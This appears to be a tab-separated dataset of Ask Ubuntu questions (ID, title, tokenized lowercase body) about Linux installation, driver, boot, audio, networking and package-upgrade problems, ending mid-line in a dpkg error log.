359388	can indicator actions be accessed via the hud in 13.10 ?	in 13.04 and before , it was possible to access the indicatorâs menus via the hud . e.g. , in order to establish a vpn connection through network manager , it was sufficient to open the hud and type `` vpn '' . or to shutdown the computer , one could open the hud and type `` shutdown '' . in 13.10 , it looks like the hud only searches the currently active application . is there a way to access indicators through the hud in 13.10 ?
359390	how do i restore deleted kernel initrd files ?	i managed to delete all of my initrd images in order to make space for new updates ( i know - stupid ) - is there a way to upload them back or do i have to reinstall my os completely ? i do n't have the live cd , but i could download it onto a usb drive i suppose . and when i start my computer i can only access the grub of course . i am fairly new to linux so please keep that in mind . thank you for your help , i really appreciate it , i 'm going crazy without my computer .
359392	wifi authentication problem	i bought a lenovo a390 from a plan , but i can not access to the internet using wifi . when i try to connect this is what happened : safe secured with wpa 2 the it blinks and gets permanently stuck up into an authentication problem . please help me solve this problem .
359398	libreoffice writer - restart footnote numbering for each page	how can i restart footnote numbering for each page in libreoffice writer ? ( all footnotes will start with 1 for each page )
359408	print command result side by side	it is possible to print the result of 2 commands side by side ... something like this something `ls -l /a` `cat bla.txt` result : total 24 # while [ 1 = 1 ] ; do -rw-r -- r -- 1 wolfy wolfy 194 aug 13 08:50 c.in # echo `` bla '' -rwxr-xr-x 1 wolfy wolfy 52 sep 24 11:48 bla.sh # done -rwxr-xr-x 1 wolfy wolfy 38 sep 24 11:48 bla1.sh echo `` bla '' -rwxr-xr-x 1 wolfy wolfy 147 sep 24 11:54 ble.sh i know that pr can do something like this with files , but i did n't find a way to do this for commands ...
359418	grub rescue ( uefi laptop )	i installed ubuntu couple days ago and suddenly the sound stopped working , could not find the solution and since i had not setup or put too much effort into it , i decided to just go ahead and resinstall . i have an asus laptop with windows 8 uefi and i was dual booting just fine . after reinstalling ubuntu it had a host of problems , no sound , wirelss was not working , trackpad was not working etc etc . i decided to do one more reinstall to see if i had more luck . now it just boots into grub rescue and thanks to this `` genius '' forced eufi feature i ca n't access the bios and change the stupid boat order . any ideas ?
359421	parallel and vmware tools for ubuntu 12.04	i have both parallels and vmware ( fusion ) where i 'd like to use a ubuntu 12.04 image but unfortunately in both i have a very similar situation ... i ca n't seem to access the drive that has the tools on it . in both cases the virtualisation software thinks it has mounted the drive and in fact the os seems to very mildly agree . i say agree because you can navigate to the /dev/disk/by-label/ and find vmware\x20tools and parallels\x20tools . if you look at where they 're pointing , in both cases you 'll find they point to ../../sr0 . ok great , so if i do an ls of ../../sr0 what do i get ? nothing . i 've also gone through each of the mounting points on /media not to mention all the `` cdrom '' and `` dvd '' entries in /dev . has anyone got this working ?
359425	something wrong with graphics > window shutter effect	i 'm having a problem with what i believe to be something to do with graphics , however , i 'm new to ubuntu and can not figure it out . i do not have a discrete graphics card , and i have un-installed and reinstalled compiz , yet nothing seems to be working , and i can not find anything online ... please see the picture below : /
359428	can not install or run ubuntu from usb flash drive	i 've already tried a lot of different variations of install but still was n't able to do this . i 'm talking about 12.04 x64 version , but i 've also tried 13.04 which does n't work either . i 'm quite sure that it 's hardware problem , so i 'll describe my pc properties : motherboard : asrock fm2a85x extreme4-m ; processor : amd a8 5600k quad-core processor ; videocard : amd radeon hd 6600 ; 4 gb ram . the screen turns off after i try to run or install ( but if i set nomodeset with x installation it will proceed a little bit , but then just freeze nonetheless ) . i also tried to install ubuntu with windows 7 installer , but ubuntu wo n't work this way . the flash drive works fine , because on other machine everything installed normally .
359429	no transparency with fglrx on 12.04	i 'm using two monitors with different resolution , the default driver can handle that with no problem , but some applications have painting problems ( e.g . thunderbird can not paint correctly and i have to hover over the windows a lot to get it to repaint , so i can read the mail subjects again . ) so i installed fglrx $ fglrxinfo display : :0 screen : 0 opengl vendor string : advanced micro devices , inc. opengl renderer string : ati radeon hd 5450 opengl version string : 4.2.12217 compatibility profile context 12.104 now thunderbird works normal again , but all transparency is lost from unity . it appears as if i 'm running unity2d now . why is that and how do i switch to opengl version ?
359433	after installing ubuntu `` no operating system installed ''	today i decided to install ubuntu on my macbook pro ( mid 2012 ) . as soon as the install process finishes after rebooting the system , i have this screen which tells me that there is no operating system installed . i tried several ways and several medias ( dvd , usb-stick ) , but i always have the error message in the end . note : i 've tried to install ubuntu 12.10 and ubuntu 13.04 , but both have the same error .
359435	ca n't install either 12.04 or 13.04 off a flash drive	i 've used two different programmes for creating a flash drive i can boot from , but each time i get the same message after choosing to boot ubuntu that says that a certain file is missing or corrupted : file : \ubuntu\winboot\wubildr.mbr status : 0xc000007b i 'm running the x64 version of windows 8 on a laptop i got not three months ago . any suggestions as to what to do ?
359438	uget not showing in system tray	i have ubuntu 13.04 with uget 1.10.3 the problem is simple : uget appindicator not visible , uget tray icon not visible and this key was not found in my system settings : com.canonical.unity.panel- > systray-whitelist
359441	mixing amd and nvidia graphics cards in ubuntu	this question has been asked before , albeit within the context of a windows 7 environment . is it possible to run amd and nvidia graphics cards concurrently in a linux ( ubuntu 12.10 ) environment ? if so , how ? ideally , one ( nvidia ) would be used for its intended purpose -- driving the display -- and the other ( amd ) would be used for computation .
359444	how to redirect all pages of particular sub-domain to another sub-domain using apache ?	i would like to redirect all references of an absolute path ( source.toto.org ) to another absolute path ( git.toto.org ) . this link is in many pages and i do not wish to change the page contents . i tried to modify my site 's .htaccess file but i do n't think my syntax is incorrect : redirect source.toto.org http : //git.toto.org any help will be greatly appreciated .
359446	why are there two sink input index generated by pulseaudio ?	i 'm planning to spawn a thread as i detect a new sink input index in pulseaudio . but when i run some application , i find out that a second sink index for same client is created . the system spawns a thread and closes the first thread , which has nothing to do with the current running program . i am tracing this as a reference which is generated by running my code , which detects new sink input index as generated when i run the openarena game . ****sink input playback stream with index 0 is detected hello**** ======= [ sink input # 0 ] ======= name : playback stream client:11 sink:0 sample format:3 sample rate:44100 sample channels:2 owner module:7 buffer usec:160068 sink usec:210498 driver : protocol-native.c client name : warzone 2100 ****removing sink input 0**** ****sink input playback stream with index 1 is detected hello**** ======= [ sink input # 1 ] ======= name : playback stream client:11 sink:0 sample format:3 sample rate:44100 sample channels:2 owner module:7 buffer usec:346689 sink usec:23883 driver : protocol-native.c client name : warzone 2100 ****removing sink input 1**** ****sink input playback stream with index 2 is detected hello**** ======= [ sink input # 2 ] ======= name : playback stream client:13 sink:0 sample format:3 sample rate:44100 sample channels:2 owner module:7 buffer usec:160068 sink usec:210488 driver : protocol-native.c client name : torcs-bin ****removing sink input 2**** ****sink input playback stream with index 3 is detected hello**** ======= [ sink input # 3 ] ======= name : playback stream client:13 sink:0 sample format:3 sample rate:44100 sample channels:2 owner module:7 buffer usec:347052 sink usec:23997 driver : protocol-native.c client name : torcs-bin ****removing sink input 3**** ****sink input playback stream with index 4 is detected hello**** ======= [ sink input # 4 ] ======= name : playback stream client:20 sink:0 sample format:3 sample rate:44100 sample channels:2 owner module:7 buffer usec:160068 sink usec:210464 driver : protocol-native.c client name : ioquake3 ****removing sink input 4**** ****sink input playback stream with index 5 is detected hello**** ======= [ sink input # 5 ] ======= name : playback stream client:20 sink:0 sample format:3 sample rate:44100 sample channels:2 owner module:7 buffer usec:346507 sink usec:23980 driver : protocol-native.c client name : ioquake3 ****removing sink input 5**** ****sink input simple directmedia layer with index 6 is detected hello**** ======= [ sink input # 6 ] ======= name : simple directmedia layer client:24 sink:0 sample format:0 sample rate:11025 sample channels:1 owner module:7 buffer usec:265147 sink usec:105270 driver : protocol-native.c client name : test stream ****removing sink input 6**** ****sink input playback stream with index 7 is detected hello**** ======= [ sink input # 7 ] ======= name : playback stream client:26 sink:0 sample format:3 sample rate:44100 sample channels:2 owner module:7 buffer usec:91133 sink usec:209540 driver : protocol-native.c client name : megaglest ****removing sink input 7**** ****sink input playback stream with index 8 is detected hello**** ======= [ sink input # 8 ] ======= name : playback stream client:26 sink:0 sample format:3 sample rate:44100 sample channels:2 owner module:7 buffer usec:347233 sink usec:22750 driver : protocol-native.c client name : megaglest ****removing sink input 8**** the only difference between this sink index 0 and 1 is the buffer usec and sink usec , which is the one i found . i want to know what the reason behind this is . why does it create 2 sink input index every time i run this game or any other game ( i also tried on other games and i got same result ) .
359456	.ape files not playing in banshee , vlc , quod libet	i am on linux 13.04 , trying to run an ape file in banshee media player . however , the song stops about 8 seconds in . the same thing happens in vlc and quod libet . however , the file i 'm testing runs perfectly in audacious . i have ffmpeg . i would be very glad if someone could help . i am very new to linux , so if more info is required , please tell me how to find that info , and i 'll post it here . cheers : )
359457	problem with lubuntu in a moment all desktop icons lost and i cant create new icons on my desktop , why ?	hello all i need your help ! am using lubuntu last version ( in greek language ) , is updated and i had till now no problem . just now , in a moment with no reason , all the icons of my desktop disappeared and i cant copy any new icons from other folders to my desktop anymore and even i cant create any new icons on desktop ! i dont understand whats going on here and whats the problem ... ! ? i really dont know.. please help me to fix this very strange problem that occurred ! see this picture , am getting this message , when am trying to copy any icon on desktop : http : //i39.tinypic.com/2ikb7s6.png edit - image translation : `` the process is complete but there are errors ''
359462	can i install on dell studio 1535 laptop ?	i have an old dell studio 1535 laptop running vista . it runs like garbage . i 'm thinking of purchasing a new laptop for most purposes , but thought i would repurpose the old one as a media player/backup/kids machine . any issues installing ubuntu on it ? i 've never installed linux before , and want it to be an easy installation experience . i 'm mainly worried about the wireless lan card and the hdmi output working . if i can get online and use the hdmi output to a tv , i could use it as intended . these are the rough specs i pulled : studio 1535 broadcom 1397 wlan ? ? 3 gb ram 2.16 ghz intel graphics
359465	ubuntu doesnâ´t start after installation	this is my first time to run ubuntu on a pc . i have made a bootfile on my usb and the installations goes without any problem . when the installation is finished it says the computer needs to restart . here is where the problems starts : i just get an error message looking like this : gave up waiting for root device . common problems : - boot args ( cat /proc/cmdline ) - check rootdelay= ( did the system wait long enough ? ) - check root= ( did the system wait for the right device ? ) - missing modules ( cat /proc/modules ; ls dev ) if i restart the computer from the usb stick it ask if i want to install ubuntu in parallel with ubuntu . so i assume that there is an installation on my pc . i have tried both 12.04 and 13.10 with the same result . i have tried to wait and to write exit under the error message but it will not start .
359468	upstart - start after task finished	i have an upstart job configured using the task stanza , which another job depends on being finished before it starts . however , this job must also wait for a different service to be started before it starts . this causes some problems - the job will start if the task finishes before the dependent job has started , but it will not start if the task finishes after the job starts . for example , let task-a be the task that the job depends on , then this is the job 's configuration file : start on ( stopped task-a and started cups ) script echo do stuff end script how can i get a job like the one above to start once the task has finished but after another job has started ? i can modify the task if necessary , but i do n't think sleeping forever is a very good solution . the ubuntu version in this case is 12.04 .
359472	how to recover deleted files in ubuntu ?	i am using kubuntu 13.04 and accidentally i have deleted my important .pdf files by pressing shift+delete . it was in the home directory . is there any way by which i could recover them back ?
359473	upgrade 12.04 to 12.04.1	i ca n't install meteor because openssl does n't like its certificates . this http : //tech.nickserra.com/2012/10/22/ubuntu-server-12-0-4-ssl23_get_server_hellosslv3-alert-handshake-failure/ has a simple answer : upgrade 12.04 to 12.04.1 how do i do so from the cli ? is such an upgrade path available for 12.04 lts 64-bit ?
359476	wired netoworking will not start	i have tried looking thorugh your forums as well as many others , and i cant seem to find a solution to my problem . i currently have a ubuntu 12.04 vm installed on a hyper-v . i upgraded this system from a 10.04 system using the do-release-upgrade option . i went through the process of configuring the network settings through network manager , but i still can not connect to the network . i have started and stopped the network manager service a number of times . i have also restarted the machine too . i tried editing the /etc/network/interfaces file and that did not work . i even tried sudo apt-get install -- reinstall network-manager to see if that would help , and it has not . also for some reason when i set the gateway , i am not able to ping my gateway address . is there something that i am missing ? is there something i am doing wrong ? i cant revert to the previous version of ubuntu because i forgot to take a snapshot before upgrading . i ran the command killall -9 networkmanager and that will allow the wired network to connect , but i still can not get to the internet for some reason . i tries using steps from this forum below and still no luck . http : //ubuntuforums.org/showthread.php ? t=1983054 & page=4 any help would be nice , thanks .
359479	installing cinnamon 2 on ubuntu 13.04	i recently upgraded to ubuntu 13.04 , from 12.04 ( via 12.10 ) where i had been using cinnamon 1.8 . post-upgrade i have tried unsuccessfully to re-install cinnamon . i have tried : from the 13.04 repo 's but 'nothing ' happens when i select cinnamon from the logon menu ( by 'nothing ' i mean i get a blank screen and there are errors in syslog implying cinnamon is n't starting correctly ) from the developer 's stable ppa : this is currently cinnamon 2.02 but the install fails with unmet dependencies : the following packages have unmet dependencies . cinnamon : depends : libcogl-pango0 ( > = 1.7.4 ) but it is not installable depends : libcogl9 ( > = 1.9.6 ) but it is not installable from the .deb packages at the developer 's ppa specific for 13.04 but these produce many unmet dependencies ( as expected i guess ) my thoughts are that the 13.04 repo 's having 1.7.4 of cinnamon in means that my 1.8 configuration is ( somehow ) making it fail to start . but i do n't see why the installation from the developer 's stable repo should fail with unmet dependencies . has anyone else met , and solved this ? ( i 've really tried to get on with unity , but ca n't )
359481	where in linux file system can i see files of hadoop hdfs ?	i am a just data analyst hails from non cs background ( not a hardcore system programmer ) working on linux os . while exploiting analysis using hadoop , a question was coming to my mind that ... / is a root under which all files of your system exists in a hierarchical manner . in hadoop envirorment , a special file system called as hdfs is there which is actually meant to store huge files to be processed by hadoop programming frameworks . hadoop -fs put localfile.txt although , such files should be accessible under / . so where can i see such files by using cat , less or more linux commands without prefixing hadoop -fs if , unfortunately i get some error in hadoop/hdfs environment , then how can i acess my data which is still residing on my linux machine .
359483	unable to mount external hdd	i was copying data from pc to my lacie external 500 gb hdd . and simultaneously i was accessing files on my pc and on that external hdd . but after some time file system stopped responding and showed the error saying videos folder is not responding and gave two options as force quit or wait ... .i chose wait option but it did n't work and showed the error again . so i clicked on force close and system stopped copying the data . now the system detects the external hdd but i 'm not able to mount it . system shows the error message saying input/output error . so how can i solve this problem without formatting my external hdd ? refer following link for screenshot https : //docs.google.com/file/d/0b4rwcneemcftswrfss1qx0f6bhm/edit ? usp=sharing . after that i even tried to live boot the elementary os luna from usb thinking that my external hdd might get mounted but it did n't work .
359484	auto-fire/rapid fire/turbo on gamepads	the gamepad works fine as is , but i have n't found a way to make one of the buttons do auto-fire . i tried jstest-gtk , but it does n't have any options like that . i 'm using ubuntu 13.04 .
359485	installing ubuntu server 13.04 amd64 over raid1 wo n't show grub boot loader	there was a windows 2008 server r2 machine with a 500gb raid 1 via intel hardware . i 'm installing ubuntu server 13.04 amd64 , over the raid 1 ... the installer recognizes the raid , and i confirm to active it , and everything goes fine ... the installation ends with successful , as so the grub boot loader instalation . i remove the dvd and after i rebooted the machine there is no grub , there is no ubuntu ... can someone help me to find the solution ?
359486	are encrypted deja-dup backups resumable ?	i have about 1tb of data i 'd like to make an encrypted backup of over a period of a few sessions . i 'm guessing under the hood deja-dup uses something like rsync and only modifies a backup when necessary ( files have been added or changed ) . however , when making an encrypted backup does each file have to be reencrypted before it can be compared to its backed up version ? that is , can an encrypted backup resume where it left off , or must it start from the beginning , doing each encryption along the way ?
359487	node symlink wrong after upgrade	i recently upgraded my node install and while nodejs shows version v0.10.20 the symlink ( node in /usr/bin/node ) is still reporting version as v0.10.18 i tried removing and re-adding the symlink but it still shows v0.10.18 did i do something wrong , or is there some type of magic that i just do n't understand ?
359488	where can i get the newest proprietary nvidia drivers	ubuntu 13.04 nvidia gtx580 as you can see in the image the newest proprietary nvidia driver is version 313 . the newest open-source one is version 331 . where can i get the newest proprietary driver for my gpu . and how do i install them ?
359490	software center not opening on ubuntu 13.04 due to gdk-error	i know there 's a lot of other questions about similar problems , but my error seems different from the others . ( apologies if i actually missed the one that addresses mine ) when i open software center i get this error . i tried to remove it ( apt-get remove -- purge software-center and re-installed it , but the error remained ) . what is wrong ? i thought it could be something related to gnome , so i changed to unity , but the problem still occurs . i am running ubuntu 13.04 . 013-10-15 18:13:49,317 - softwarecenter.ui.gtk3.app - info - setting up proxy 'none' 2013-10-15 18:13:49,626 - softwarecenter.backend.reviews - warning - could not get usefulness from server , no username in config file 2013-10-15 18:13:49,628 - softwarecenter.plugin - info - activating plugin ' < module 'webapps_activation ' from '/usr/share/software-center/softwarecenter/plugins/webapps_activation.pyc ' > ' 2013-10-15 18:13:49,634 - softwarecenter.fixme - warning - logs to the root logger : ' ( '/usr/lib/python2.7/dist-packages/gi/importer.py ' , 51 , 'find_module ' ) ' 2013-10-15 18:13:49,634 - root - error - could not find any typelib for launchpadintegration 2013-10-15 18:13:49,659 - softwarecenter.db.pkginfo_impl.aptcache - info - aptcache.open ( ) 2013-10-15 18:13:50,937 - softwarecenter.fixme - warning - logs to the root logger : ' ( '/usr/share/software-center/softwarecenter/utils.py ' , 271 , 'get_title_from_html ' ) ' 2013-10-15 18:13:50,937 - root - warning - failed to parse : ' < div style= '' background-color : # 161513 ; width:1680px ; height:200px ; '' > â < div style= '' background : url ( '/site_media/exhibits/2013/09/aamfp_leaderboard_700x200_1.jpg ' ) top left no-repeat ; width:700px ; height:200px ; '' > < /div > < /div > ' ( 'ascii ' codec ca n't encode character u'\xa0 ' in position 70 : ordinal not in range ( 128 ) ) ( software-center:5947 ) : gdk-error ** : the program 'software-center ' received an x window system error . this probably reflects a bug in the program . the error was 'baddrawable ( invalid pixmap or window parameter ) ' . ( details : serial 2420 error_code 9 request_code 62 minor_code 0 ) ( note to programmers : normally , x errors are reported asynchronously ; that is , you will receive the error a while after causing it . to debug your program , run it with the gdk_synchronize environment variable to change this behavior . you can then get a meaningful backtrace from your debugger if you break on the gdk_x_error ( ) function . ) trace/breakpoint trap ( core dumped )
359491	installing libboost-all-dev on ubuntu 12.04	i am using ubuntu 12.04 . i have to install libboost but i could not do this . i can not install neither for software center nor using sudo . software center says : this error could be caused by required additional software packages which are missing or not installable . furthermore there could be a conflict between software packages which are not allowed to be installed at the same time .
359492	create a shortcut for url ?	how can i create a shortcut for url in my desktop ? i want to use them in firefox or chrome . if a copy and paste did n't work . what script i have to use ?
359494	bluetooth not working in asus x53u	i am using asus x53u laptop which is having 320 gb of hdd and 2 gb of ram and just installed ubuntu 12.10 . i am having an problem using bluetooth in ubuntu . i have turned on the phisical/logical switch of my laptop an when i try to connect my phone with my laptop a message pops up that `` no adapters found '' on my ubuntu screen . do i need to install any drivers for it and if yes please tell me where to get them and if no then please tell me how to fix it .
359496	big problem when installing ubuntu . operating system not detected . help please	i 'm trying to install ubuntu alongside windows 8 on my laptop . during the installation , i get to the bit where you select if you want to dual boot windows and ubuntu , or wipe the whole disc and just have ubuntu there . rather than asking me whether i would like to install alongside windows , it tells me that there are no operating systems detected , and the only option i have is to wipe the entire disc and continue . i looked on the internet , and it suggests putting the computer in legacy boot , instead of uefi . i tried this , and i get the dreaded syslinux ... . peter anvin et al error . basically , the usb wo n't boot at all , not even to the ubuntu splash screen . this was a frequent error on my little netbook , and it turned out to be the file system causing the problem . i do n't think it supported fat32 bootable drives ... it also says to try booting with secure boot turned off , but the option is grayed out in the bios , so i ca n't . any ideas guys ? the laptop is an acer v3-571g ( intel i7-3610qm , 8gb ram , nvidia geforce gt 640m - 2gb vram ) . please help me ! !
359498	laptop over heating after 13.04 . video driver ?	i recently installed ubuntu 13.04 on my hp probook 6465g , radeon hd 6520g . now my laptop runs super hot , lag/no response from games , cpu at 80-100 % ( even when doing simple tasks ) and the fans are going crazy . i have a feeling that this must be something with my video driver ? im currently using x.orgxserver- amd/aati display driver . ( open source ) -- which was set by default ) the two other options to choose from in `` software & updates '' is : -video driver for the amd graphics accelerators from fglrx-updates ( proprietary ) ..and -video driver for the amd graphics accelerators from fglrx ( proprietary ) i have tested both , but cant tell one was better than the other.. i 've looked for a solution at the amd sites and other forums , but no go . please help ! !
359501	`` can not access ppa '' trying to download ubuntu sdk	i was trying to download ubuntu sdk entering : sudo add-apt-repository ppa : ubuntu-sdk-team/ppa & & sudo apt-get update & & sudo apt-get install ubuntu-sdk however , the answer was can not acces ppa , please check your internet connection , which i did by pinging google . my internet connection was fine . i also tryed swapping add-apt to apt-add which did n't work either . does someone know an answer ?
359507	wubi installation does n't start ?	i wanted to try out ubuntu on my desktop pc . i downloaded ubuntu 13.04 64 bit version and i try to install it using wubi and after restart the computer and chose ubuntu from boot menu . when i press enter it 's going to load and you 'll see a - sign in the top left corner of my screen . after that nothing happens .
359509	best way to automagically mount and share usb drives in ubuntu server 12.04	i 'd like to find a way to automatically mount any external usb drive connected to my server , and then to automatically share it via samba . the main thing that confuses me is how to handle unmounting it before it is unplugged without having to fire up a command line . the usb drives will also be used in windows environments and will therefore be fat or ntfs formatted . for reasons i wo n't go into , my family has a number of laptops with no access to usb ports . i 'm just trying to create a simple way for them to be able to plug a usb pen into my server , access a samba share to throw on a couple of work/college assignments etc , and then unplug . ideally , this needs to happen without me having to ssh into my server every time . thanks .
359514	how to switch from amd graphics to intel without fglrx driver	i am a pretty new linux user . so please be as descriptive as possible . i have ubuntu 12.04 with radeon hd 5650 on my laptop . i can easily switch between these two in windows . i want to be able to switch to intel hd graphics because amd causes heating problem and fan runs very noisy . in addition , it is my work computer and i wo n't be needing any graphics acceleration . i have a problem with catalyst driver . when i activate it , i get the error message `` running in low graphics mode '' on startup . then i have to switch to the generic driver . i was working on this issue for weeks . i tried many things from the forums but i got nothing . i purged the driver and installed it from amd website . i caused linux to crash several times and re-installed it . so that i really do n't want to deal with it much . i want to stay on the safe side . so please be sure that it is safe before posting . i trieed : sudo su - echo off > /sys/kernel/debug/vgaswitcheroo/switch and i got : -su : /sys/kernel/debug/vgaswitcheroo/switch : no such file or directory and there is no option about it in bios . what should i do to switch to intel hd graphics ? > > grep -i switcheroo /boot/config-* /boot/config-3.8.0-29-generic : config_vga_switcheroo=y /boot/config-3.8.0-31-generic : config_vga_switcheroo=y` > > ls -l /sys/kernel/debug/vgaswitcheroo/ ls : can not access /sys/kernel/debug/vgaswitcheroo/ : no such file or directory > > cat /etc/default/grub | grep cmdline grub_cmdline_linux_default= '' quiet splash '' grub_cmdline_linux= '' '' when i open additional drivers from `` system settings '' it says : no proprietary drivers are in use on this system . ati/amd proprietary fglrx graphics driver ( **experimental**beta ) this driver is activated but not currently in use .
359516	ca n't execute binaries in a mounted ext filesystem , why ?	i recently moved some files from ntfs to ext4 in my external disk . i am not able to run executable files after i convert it to ext4 . below is the fstab entry i use to mount the ext4 partition . uuid= { uuid } { path } ext4 rw , async , suid , dev , exec , user 1 1 below is the permission for the file i am trying to run -rwxrwxrwx 1 { myid } { myid } 73015 oct 9 09:38 eclipse when i try to run the program from command line , i get following error message bash : ./eclipse : permission denied when i try to run the program from nautilus , i get a message that 'there is no application installed for executable files ' . i checked the permissions tab in the file properties and the 'allow executing file as program ' bit is set .
359518	dc++ stopped working after upgradation to ubuntu 13.04	i am a newbie to linux . recently i upgraded from 12.10 to 13.04 . however after doing so , i am no longer able to connect to dc++ hub provided by my college . it worked just fine with previous version . but , after upgrading , it connects and then disconnects within a flick . the result is same with linuxdc++ , eiskalt dc++ , apex ( via wine ) ... the result displayed in all of them is typically the same viz . [ 17:07 ] *** connecting to dc.sdslabs.co.in ... [ 17:07 ] *** connected [ 17:07 ] *** connect failed : connection closed the hub is fine and working , no doubts about that ! could anyone please guide me through what may be wrong ( preferably in a noob-proof manner ) .
359521	after distr upgrade trying to install firefox or any other program	after distr upgrade from ubuntu server 10.10 to 12.10 i get error messages tryind to install firefox or any other program and when in terminal i am runnning : apt-get install firefox my output is : reading package lists ... done building dependency tree reading state information ... done firefox is already the newest version . 0 upgraded , 0 newly installed , 0 to remove and 3 not upgraded . 22 not fully installed or removed . after this operation , 0 b of additional disk space will be used . do you want to continue [ y/n ] ? y setting up initscripts ( 2.88dsf-13.10ubuntu11.1 ) ... mkdir : can not create directory `/dev/shm ' : file exists dpkg : error processing initscripts ( -- configure ) : subprocess installed post-installation script returned error exit status 1 dpkg : dependency problems prevent configuration of procps : procps depends on initscripts ; however : package initscripts is not configured yet . dpkg : error processing procps ( -- configure ) : dependency problems - leaving unconfigured dpkg : dependency problems prevent configuration of udev : udev depends on procps ; however : package procps is not configured yet . dpkg : error processing udev ( -- configure ) : dependency problems - leaving unconfigured dpkg : dependency problems prevent configuration of dmsetup : dmsetup depends on udev ( > > 141-2 ) ; however : package udev is not configured yet . dpkg : error processing dmsetup ( -- configure ) : dependency problems - leaving unconfigured dpkg : dependency problems prevent configuration of netbase : netbase depends on initscripts ; however : package initscripts is not configno apport report written because the error message indicates its a followup error from a previous failure . no apport report written because the error message indicates its a followup error from a previous failure . no apport report written because the error message indicates its a followup error from a previous failure . no apport report written because the error message indicates its a followup error from a previous failure . no apport report written because the error message indicates its a followup error from a previous failure . no apport report written because the error message indicates its a followup error from a previous failure . no apport report written because the error message indicates its a followup error from a previous failure . no apport report written because the error message indicates its a followup error from a previous failure . no apport report written because the error message indicates its a followup error from a previous failure . no apport report written because the error message indicates its a followup error from a previous failure . no apport report written because the error message indicates its a followup error from a previous failure . no apport report written because the error message indicates its a followup error from a previous failure . ured yet . dpkg : error processing netbase ( -- configure ) : dependency problems - leaving unconfigured dpkg : dependency problems prevent configuration of dbus : dbus depends on netbase ( > = 4.45ubuntu3 ) ; however : package netbase is not configured yet . dpkg : error processing dbus ( -- configure ) : dependency problems - leaving unconfigured dpkg : dependency problems prevent configuration of consolekit : consolekit depends on dbus ( > = 1.1.2 ) ; however : package dbus is not configured yet . dpkg : error processing consolekit ( -- configure ) : dependency problems - leaving unconfigured dpkg : dependency problems prevent configuration of ifupdown : ifupdown depends on initscripts ( > = 2.88dsf-13.3 ) ; however : package initscripts is not configured yet . dpkg : error processing ifupdown ( -- configure ) : dependency problems - leaving unconfigured dpkg : dependency problems prevent configuration of apache2.2-common : apache2.2-common depends on procps ; however : package procps is not configured yet . dpkg : errono apport report written because the error message indicates its a followup error from a previous failure . no apport report written because the error message indicates its a followup error from a previous failure . no apport report written because the error message indicates its a followup error from a previous failure . no apport report written because the error message indicates its a followup error from a previous failure . no apport report written because the error message indicates its a followup error from a previous failure . no apport report written because the error message indicates its a followup error from a previous failure . no apport report written because the error message indicates its a followup error from a previous failure . no apport report written because the error message indicates its a followup error from a previous failure . no apport report written because the error message indicates its a followup error from a previous failure . r processing apache2.2-common ( -- configure ) : dependency problems - leaving unconfigured dpkg : dependency problems prevent configuration of apache2-mpm-prefork : apache2-mpm-prefork depends on apache2.2-common ( = 2.2.22-1ubuntu1.4 ) ; however : package apache2.2-common is not configured yet . dpkg : error processing apache2-mpm-prefork ( -- configure ) : dependency problems - leaving unconfigured dpkg : dependency problems prevent configuration of apache2 : apache2 depends on apache2-mpm-worker ( = 2.2.22-1ubuntu1.4 ) | apache2-mpm-prefork ( = 2.2.22-1ubuntu1.4 ) | apache2-mpm-event ( = 2.2.22-1ubuntu1.4 ) | apache2-mpm-itk ( = 2.2.22-1ubuntu1.4 ) ; however : package apache2-mpm-worker is not installed . package apache2-mpm-prefork is not configured yet . package apache2-mpm-event is not installed . package apache2-mpm-itk is not installed . apache2 depends on apache2.2-common ( = 2.2.22-1ubuntu1.4 ) ; however : package apache2.2-common is not configured yet . dpkg : error processing apache2 ( -- configure ) : dependency problems - leaving unconfigured dpkg : dependency problems prevent configuration of bind9 : bind9 depends on netbase ; however : package netbase is not configured yet . dpkg : error processing bind9 ( -- configure ) : dependency problems - leaving unconfigured dpkg : dependency problems prevent configuration of cryptsetup : cryptsetup depends on dmsetup ; however : package dmsetup is not configured yet . dpkg : error processing cryptsetup ( -- configure ) : dependency problems - leaving unconfigured dpkg : dependency problems prevent configuration of openssh-server : openssh-server depends on procps ; however : package procps is not configured yet . dpkg : error processing openssh-server ( -- configure ) : dependency problems - leaving unconfigured dpkg : dependency problems prevent configuration of policykit-1 : policykit-1 depends on consolekit ; however : package consolekit is not configured yet . policykit-1 depends on dbus ; however : package dbus is not configured yet . dpkg : error processing policykit-1 ( -- configure ) : dependency problems - leaving unconfigured dpkg : dependency problems prevent configuration of samba : samba depends on procps ; however : package procps is not configured yet . dpkg : error processing samba ( -- configure ) : dependency problems - leaving unconfigured dpkg : dependency problems prevent configuration of python-aptdaemon : python-aptdaemon depends on policykit-1 ; however : package policykit-1 is not configured yet . dpkg : error processing python-aptdaemon ( -- configure ) : dependency problems - leaving unconfigured dpkg : dependency problems prevent configuration of aptdaemon : aptdaemon depends on python-aptdaemon ( = 0.43+bzr805-0ubuntu9 ) ; however : package python-aptdaemon is not configured yet . dpkg : error processing aptdaemon ( -- configure ) : dependency problems - leaving unconfigured dpkg : dependency problems prevent configuration of xul-ext-ubufox : xul-ext-ubufox depends on aptdaemon ; however : package aptdaemon is not configured yet . dpkg : error processing xul-ext-ubufox ( -- configure ) : dependency problems - leaving unconfigured dpkg : dependency problems prevent configuration of libdevmapper1.02.1 : libdevmapper1.02.1 depends on dmsetup ( > = 2:1.02.48-4ubuntu7.3 ) ; however : package dmsetup is not configured yet . dpkg : error processing libdevmapper1.02.1 ( -- configure ) : dependency problems - leaving unconfigured dpkg : dependency problems prevent configuration of libcryptsetup4 : libcryptsetup4 depends on libdevmapper1.02.1 ( > = 2:1.02.36 ) ; however : package libdevmapper1.02.1 is not configured yet . dpkg : error processing libcryptsetup4 ( -- configure ) : dependency problems - leaving unconfigured dpkg : dependency problems prevent configuration of cryptsetup-bin : cryptsetup-bin depends on libcryptsetup4 ( > = 2:1.4 ) ; however : package libcryptsetup4 is not configured yet . dpkg : error processing cryptsetup-bin ( -- configure ) : dependency problems - leaving unconfigured errors were encountered while processing : initscripts procps udev dmsetup netbase dbus consolekit ifupdown apache2.2-common apache2-mpm-prefork apache2 bind9 cryptsetup openssh-server policykit-1 samba python-aptdaemon aptdaemon xul-ext-ubufox libdevmapper1.02.1 libcryptsetup4 cryptsetup-bin e : sub-process /usr/bin/dpkg returned an error code ( 1 ) just to let you know i 'm quite new in linux , so would be appreciated to get answers as simple as possible and what is what and why . commands used to upgrade disro was : sudo sed -i -e 's/archive.ubuntu.com\|security.ubuntu.com/old-releases.ubuntu.com/g ' /etc/apt/sources.list sudo apt-get update & & sudo apt-get dist-upgrade sudo apt-get update & & sudo apt-get upgrade & sudo apt-get 